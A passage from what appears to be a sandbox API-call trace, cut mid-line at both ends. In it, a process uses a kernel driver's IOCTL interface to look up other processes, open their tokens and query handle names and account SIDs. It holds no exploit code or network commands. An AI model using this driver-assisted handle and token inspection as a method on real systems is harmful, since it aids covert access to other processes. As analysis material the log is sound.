[3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.907] CloseHandle (hObject=0xc4) returned 1 [0245.907] CloseHandle (hObject=0xc8) returned 1 [0245.907] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.907] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.907] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.907] PsAcquireProcessExitSynchronization () returned 0x0 [0245.907] KeStackAttachProcess (in: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880053c85d0) [0245.907] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ee82d0, HandleInformation=0x0) returned 0x0 [0245.907] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.907] PsReleaseProcessExitSynchronization () returned 0x2 [0245.907] ObfDereferenceObject (Object=0xfffffa8001ee8b30) returned 0x12 [0245.908] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.908] ObfDereferenceObject (Object=0xfffffa8001ee82d0) returned 0x1 [0245.908] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.908] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.908] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.908] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x64, lpOverlapped=0x0) returned 1 [0245.908] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.908] PsAcquireProcessExitSynchronization () returned 0x0 [0245.908] KeStackAttachProcess (in: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880053c85d0) [0245.908] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ede150, HandleInformation=0x0) returned 0x0 [0245.908] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.908] PsReleaseProcessExitSynchronization () returned 0x2 [0245.908] ObfDereferenceObject (Object=0xfffffa8001ee8b30) returned 0x12 [0245.908] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.908] ObfDereferenceObject (Object=0xfffffa8001ede150) returned 0x1 [0245.908] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.908] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.908] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.908] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.908] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.908] PsAcquireProcessExitSynchronization () returned 0x0 [0245.908] KeStackAttachProcess (in: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880053c85d0) [0245.908] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.908] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.908] PsReleaseProcessExitSynchronization () returned 0x2 [0245.909] ObfDereferenceObject (Object=0xfffffa8001ee8b30) returned 0x12 [0245.909] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.909] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.909] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.909] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.909] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x694) returned 0xc8 [0245.909] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.909] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001f45b30, HandleInformation=0x0) returned 0x0 [0245.909] ObOpenObjectByPointer (in: Object=0xfffffa8001f45b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff800007dc) returned 0x0 [0245.909] ObfDereferenceObject (Object=0xfffffa8001f45b30) returned 0x14 [0245.909] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007dc, DesiredAccess=0x8, TokenHandle=0xfffffa80030a6d00 | out: TokenHandle=0xfffffa80030a6d00*=0xc4) returned 0x0 [0245.909] ZwClose (Handle=0xffffffff800007dc) returned 0x0 [0245.909] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.909] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.909] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.913] CloseHandle (hObject=0xc4) returned 1 [0245.913] CloseHandle (hObject=0xc8) returned 1 [0245.913] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.913] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.913] PsLookupProcessByProcessId (in: ProcessId=0x694, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.913] PsAcquireProcessExitSynchronization () returned 0x0 [0245.913] KeStackAttachProcess (in: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880053c85d0) [0245.914] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f42dd0, HandleInformation=0x0) returned 0x0 [0245.914] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.914] PsReleaseProcessExitSynchronization () returned 0x2 [0245.914] ObfDereferenceObject (Object=0xfffffa8001f45b30) returned 0x12 [0245.914] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.914] ObfDereferenceObject (Object=0xfffffa8001f42dd0) returned 0x1 [0245.914] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.914] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.914] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.914] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0245.914] PsLookupProcessByProcessId (in: ProcessId=0x694, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.914] PsAcquireProcessExitSynchronization () returned 0x0 [0245.914] KeStackAttachProcess (in: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880053c85d0) [0245.914] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80019de810, HandleInformation=0x0) returned 0x0 [0245.914] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.914] PsReleaseProcessExitSynchronization () returned 0x2 [0245.914] ObfDereferenceObject (Object=0xfffffa8001f45b30) returned 0x12 [0245.914] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.914] ObfDereferenceObject (Object=0xfffffa80019de810) returned 0x1 [0245.914] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.914] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.914] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.914] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.914] PsLookupProcessByProcessId (in: ProcessId=0x694, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.915] PsAcquireProcessExitSynchronization () returned 0x0 [0245.915] KeStackAttachProcess (in: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880053c85d0) [0245.915] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.915] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.915] PsReleaseProcessExitSynchronization () returned 0x2 [0245.915] ObfDereferenceObject (Object=0xfffffa8001f45b30) returned 0x12 [0245.915] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.915] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.915] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.915] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x734) returned 0xc8 [0245.915] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.915] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001f99b30, HandleInformation=0x0) returned 0x0 [0245.915] ObOpenObjectByPointer (in: Object=0xfffffa8001f99b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.915] ObfDereferenceObject (Object=0xfffffa8001f99b30) returned 0x14 [0245.915] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.915] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.915] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.915] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.915] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.917] CloseHandle (hObject=0xc4) returned 1 [0245.917] CloseHandle (hObject=0xc8) returned 1 [0245.917] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.917] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.917] PsLookupProcessByProcessId (in: ProcessId=0x734, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.917] PsAcquireProcessExitSynchronization () returned 0x0 [0245.917] KeStackAttachProcess (in: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880053c85d0) [0245.918] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f6c6e0, HandleInformation=0x0) returned 0x0 [0245.918] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.918] PsReleaseProcessExitSynchronization () returned 0x2 [0245.918] ObfDereferenceObject (Object=0xfffffa8001f99b30) returned 0x12 [0245.918] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.918] ObfDereferenceObject (Object=0xfffffa8001f6c6e0) returned 0x1 [0245.918] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.918] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.918] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.918] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0245.918] PsLookupProcessByProcessId (in: ProcessId=0x734, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.918] PsAcquireProcessExitSynchronization () returned 0x0 [0245.918] KeStackAttachProcess (in: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880053c85d0) [0245.918] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f6cf20, HandleInformation=0x0) returned 0x0 [0245.918] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.918] PsReleaseProcessExitSynchronization () returned 0x2 [0245.918] ObfDereferenceObject (Object=0xfffffa8001f99b30) returned 0x12 [0245.918] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.918] ObfDereferenceObject (Object=0xfffffa8001f6cf20) returned 0x1 [0245.918] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.918] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.918] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.918] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.918] PsLookupProcessByProcessId (in: ProcessId=0x734, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.918] PsAcquireProcessExitSynchronization () returned 0x0 [0245.919] KeStackAttachProcess (in: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001f99b30, ApcState=0xfffff880053c85d0) [0245.919] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.919] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.919] PsReleaseProcessExitSynchronization () returned 0x2 [0245.919] ObfDereferenceObject (Object=0xfffffa8001f99b30) returned 0x12 [0245.919] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.919] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0245.919] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.919] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xc8 [0245.919] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.919] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800ea389f0, HandleInformation=0x0) returned 0x0 [0245.919] ObOpenObjectByPointer (in: Object=0xfffffa800ea389f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0245.919] ObfDereferenceObject (Object=0xfffffa800ea389f0) returned 0x14 [0245.919] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0245.919] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0245.919] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.919] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.919] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.921] CloseHandle (hObject=0xc4) returned 1 [0245.922] CloseHandle (hObject=0xc8) returned 1 [0245.922] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.922] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0245.922] PsLookupProcessByProcessId (in: ProcessId=0x688, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.922] PsAcquireProcessExitSynchronization () returned 0x0 [0245.922] KeStackAttachProcess (in: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880053c85d0) [0245.922] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a199a0, HandleInformation=0x0) returned 0x0 [0245.922] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.922] PsReleaseProcessExitSynchronization () returned 0x2 [0245.922] ObfDereferenceObject (Object=0xfffffa800ea389f0) returned 0x12 [0245.922] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.922] ObfDereferenceObject (Object=0xfffffa8003a199a0) returned 0x1 [0245.922] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.922] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.922] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.922] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0245.922] PsLookupProcessByProcessId (in: ProcessId=0x688, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.922] PsAcquireProcessExitSynchronization () returned 0x0 [0245.922] KeStackAttachProcess (in: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800ea389f0, ApcState=0xfffff880053c85d0) [0245.922] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003914330, HandleInformation=0x0) returned 0x0 [0245.922] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.922] PsReleaseProcessExitSynchronization () returned 0x2 [0245.922] ObfDereferenceObject (Object=0xfffffa800ea389f0) returned 0x12 [0245.922] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.922] ObfDereferenceObject (Object=0xfffffa8003914330) returned 0x1 [0245.923] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.923] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.923] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.923] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, 